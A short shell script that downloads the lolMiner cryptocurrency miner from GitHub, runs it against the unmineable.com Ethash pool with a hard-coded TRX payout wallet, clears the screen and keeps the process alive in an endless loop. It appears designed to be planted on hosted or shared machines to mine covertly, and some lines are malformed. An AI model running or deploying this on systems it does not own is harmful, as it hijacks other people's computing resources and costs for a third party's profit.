#!/bin/sh
wget https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.34/lolMiner_v1.34_Lin64.tar.gz &&
tar -xf lolMiner_v1.34_Lin64.tar.gz &&
cd 1.34 && clear &&
./lolMiner --algo ETHASH --pool ethash.unmineable.com:3333 --user TRX:TBsH2ed3jbtYAGfZC9EgiGjdEALJoFJHby.Web0 --ethstratum ETHPROXY /dev/null
while [ 1 ]; do
sleep 3
done
sleep 999 /dev/null
